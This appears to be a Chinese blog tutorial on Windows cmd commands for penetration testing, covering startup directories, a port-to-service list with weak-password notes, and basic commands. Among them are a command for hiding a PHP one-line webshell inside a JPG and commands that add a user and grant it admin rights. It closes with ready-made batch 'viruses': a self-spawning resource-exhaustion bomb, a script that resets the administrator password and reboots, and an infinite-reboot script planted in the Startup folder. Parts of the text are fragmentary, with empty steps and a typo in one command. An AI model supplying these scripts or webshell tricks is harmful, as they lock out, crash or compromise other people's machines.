補充:在cmd中按TAB鍵自動補全,檢視參數詳細資訊,用ping舉例
ping /?
後面加上
/?
文章目錄
- Windows系統與滲透相關任務目錄
- 開機自啟目錄
- 重新開機後自動清空目錄
- 其他常見與滲透相關目錄
- 常見端口及對應的服務
- 常用的cmd指令使用
- echo
- dir
- d: 和 cd
- tree
- md 建立目錄 rd 删除目錄
- ipconfig
- cls
- copy 複制、拼接檔案
- move移動檔案
- ren重命名
- del删除檔案
- ping
- type顯示文本檔案的内容
- reg
- nslookup -d www.baidu.com
- tasklist
- ver、winver
- start
- systeminfo
- logoff
- shutdown /s /f /t /a /r /g /l
- telnet (前提是23端口得打開)
- 配置
- 🐻:補充一點
- arp –a
- at
- win10請盡快退坑
- schtasks
- net
- cmd編寫病毒
- 耗盡系統資源的病毒
- 鎖機病毒
- 無限重新開機病毒
Windows系統與滲透相關任務目錄
開機自啟目錄
重新開機後自動清空目錄
其他常見與滲透相關目錄
常見端口及對應的服務
端口 | 對應服務 |
21 | ftp |
23 | Telnet |
80 | web |
80-89 | 可能是web |
443 | SSL心髒滴血以及一些web漏洞測試 |
445 | SMB |
1433 | MSSQL |
1521 | Oracle |
2082/2083 | cpanel主機管理系統登陸 (國外用較多) |
2222 | DA虛拟主機管理系統登陸 (國外用較多) |
3128 | squid代理預設端口漫遊内網了 |
3306 | MySQL |
3312/3311 | kangle主機管理系統登陸 |
3389 | 遠端桌面 |
5432 | PostgreSQL |
5900 | vnc |
6379 | redis未授權 |
7001,7002 | WebLogic預設弱密碼,反序列 |
7778 | Kloxo主機控制台登入 |
8000-9090 | 都是一些常見的web端口,有些運維喜歡把管理背景開在這些非80的端口上 |
8080 | tomcat/WDCP主機管理系統,預設弱密碼 |
8080,8089,9090 | JBOSS |
8083 | Vestacp主機管理系統 (國外用較多) |
8649 | ganglia |
8888 | amh/LuManager/寶塔 主機管理系統預設端口 |
11211 | memcache未授權通路 |
27017,27018 | Mongodb未授權通路 |
28017 | mongodb統計頁面 |
常用的cmd指令使用
echo
在這裡第二條指令
echo 1 > 2.txt
輸出1到1.txt裡面
echo 222>> 2.txt
追加222到2.txt
總結:一個
>
是覆寫,兩個
>>
是追加
echo /?
顯示幫助
dir
·
一個點是目前目錄
..
兩個點是上一層目錄
d: 和 cd
tree
md 建立目錄 rd 删除目錄
md
-
mkdir建立目錄
ipconfig
顯示網絡狀态IP配置。然後ipconfig有個參數
/all
可以列印所有的網絡資訊
完整指令
ipconfig /all
cls
清屏指令
copy 複制、拼接檔案
複制:
copy 1.txt ..\1.txt
拼接:
copy 1.txt+2.txt 3.txt
這裡加一句圖檔一句話木馬食用
copy tp.jpg/b+yjh.php tpyjh.jpg
move移動檔案
move ..\1.txt 2.txt
ren重命名
ren 1.txt 2.txt
del删除檔案
🌂:本指令删除不放入資源回收筒直接删除
單檔案:
del 1.txt
多檔案:
del 1.txt 2.txt 3.txt 4.txt
ping
type顯示文本檔案的内容
type 1.txt
reg
nslookup -d www.baidu.com
-d
參數檢視曆史解析記錄
## find
Add:
|
管道符
type 1.txt | find "A"
:解釋列印的文檔參數傳給find指令并查找字元串
tasklist
tasklist
-任務清單
taskkill
-關閉任務
ver、winver
start
start cmd
start ping www.baidu.com
systeminfo
logoff
shutdown /s /f /t /a /r /g /l
telnet (前提是23端口得打開)
如果顯示上面這種情況就需要手動開啟
配置
2.
3.
🐻:補充一點
Telnet伺服器選項則代表允許别人連接配接
Telnet用戶端選項則連接配接别人
arp –a
arp為ip與實體位址的映射關系表,在滲透測試中如果拿到一台内網伺服器,通過指令
arp –a
,能獲得目前内網有哪些主機
at
win10請盡快退坑
at 15:47 "shutdown /r /t 0"
在之後會配置設定一個ID
如果要删除
at 1 /delete
schtasks
net
net主要服務使用者與網絡方面東西,參數很多
net stop telnet
停止服務
net start telnet
打開服務
net user
檢視目前計算機使用者
有點和whoami類似的感覺
net user admin 123 /add
:添加一個使用者
net user admin /del
:删除一個使用者
net user XX
:檢視使用者資訊
net localfroup 使用者組名字 使用者名 /add
:這樣就可以增加管理者權限
cmd編寫病毒
采用bat腳本編寫
耗盡系統資源的病毒
echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat
鎖機病毒
echo net user administrator 123456 > 1.bat
echo shutdown /r /t 0 >> 1.bat
無限重新開機病毒
echo shutdown /r /t 0 > C:\Windows\Temp\1.bat
copy C:\Windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"